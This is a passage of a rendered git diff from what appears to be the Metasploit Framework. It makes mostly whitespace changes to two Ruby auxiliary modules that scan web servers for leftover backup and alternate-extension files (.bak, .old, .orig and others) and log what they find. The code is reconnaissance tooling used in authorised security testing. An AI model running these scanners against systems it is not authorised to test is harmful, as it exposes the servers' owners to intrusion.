}, 20)
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
rescue ::Errno::EPIPE
|
||||
rescue ::Errno::EPIPE
|
||||
end
|
||||
|
||||
print_status("Request sent.")
|
||||
|
||||
|
||||
print_status("Request sent.")
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,27 +21,27 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Previous Directory File Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies files in the first parent directory with same name as
|
||||
the given directory path. Example: Test /backup/files/ will look for the
|
||||
following files /backup/files.ext .
|
||||
following files /backup/files.ext .
|
||||
},
|
||||
'Author' => [ 'et [at] metasploit.com' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The test path. The default value will not work.", '/'])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
extensions = [
|
||||
'.null',
|
||||
extensions = [
|
||||
'.null',
|
||||
'.backup',
|
||||
'.bak',
|
||||
'.c',
|
||||
@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'.htm',
|
||||
'.jar',
|
||||
'.log',
|
||||
'.old',
|
||||
'.old',
|
||||
'.orig',
|
||||
'.o',
|
||||
'.tar',
|
||||
@ -63,18 +67,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
]
|
||||
|
||||
tpath = datastore['PATH']
|
||||
|
||||
|
||||
if tpath.eql? "/"||""
|
||||
print_error("Blank or default PATH set.");
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
extensions << datastore['EXT']
|
||||
|
||||
|
||||
extensions.each { |ext|
|
||||
begin
|
||||
testf = tpath.chop+ext
|
||||
@ -85,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
print_status("Found #{wmap_base_url}#{testf}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -95,16 +99,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'FILE',
|
||||
:data => "#{testf} Code: #{res.code}"
|
||||
)
|
||||
|
||||
|
||||
else
|
||||
print_status("NOT Found #{wmap_base_url}#{testf}")
|
||||
print_status("NOT Found #{wmap_base_url}#{testf}")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -23,42 +23,42 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP File Extension Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of additional files
|
||||
This module identifies the existence of additional files
|
||||
by modifying the extension of an existing file.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'et [at] cyberspace.org' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The path/file to identify additional files", '/default.asp']),
|
||||
OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']),
|
||||
OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']),
|
||||
], self.class)
|
||||
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]),
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
|
||||
]
|
||||
),
|
||||
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
|
||||
], self.class)
|
||||
|
||||
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
conn = false
|
||||
|
||||
|
||||
dm = datastore['NoDetailMessages']
|
||||
|
||||
|
||||
extensions= [
|
||||
'bak',
|
||||
'txt',
|
||||
@ -72,19 +72,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
tpathfile = Pathname.new(datastore['PATH'])
|
||||
tpathnoext = tpathfile.to_s[0..datastore['PATH'].rindex(tpathfile.extname)]
|
||||
|
||||
|
||||
|
||||
extensions.each { |testext|
|
||||
|
||||
|
||||
#
|
||||
# Detect error code. This module is a special case as each extension
|
||||
# usually is handled diferently by the server with different error codes
|
||||
#
|
||||
ecode = datastore['ErrorCode'].to_i
|
||||
# usually is handled diferently by the server with different error codes
|
||||
#
|
||||
ecode = datastore['ErrorCode'].to_i
|
||||
begin
|
||||
randchars = Rex::Text.rand_text_alpha(3).chomp
|
||||
tpath = tpathnoext+randchars+testext
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => tpath,
|
||||
'method' => 'GET',
|
||||
@ -92,14 +92,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}, 20)
|
||||
|
||||
return if not res
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
emesg = ""
|
||||
|
||||
|
||||
# Look for a string we can signature on as well
|
||||
if(tcode >= 200 and tcode <= 299)
|
||||
|
||||
|
||||
File.open(datastore['HTTP404Sigs']).each do |str|
|
||||
if(res.body.index(str))
|
||||
emesg = str
|
||||
@ -117,14 +117,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ecode = tcode
|
||||
print_status("Using code '#{ecode}' as not found.")
|
||||
end
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
#if not conn return
|
||||
|
||||
|
||||
begin
|
||||
tpath = tpathnoext+testext
|
||||
res = send_request_cgi({
|
||||
@ -132,18 +132,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
|
||||
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
|
||||
if dm == false
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
|
||||
#blah
|
||||
end
|
||||
else
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}")
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}")
|
||||
else
|
||||
print_status("Found #{wmap_base_url}#{tpath}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -151,14 +151,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'FILE',
|
||||
:data => "#{tpath} Code: #{res.code}"
|
||||
)
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
}
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user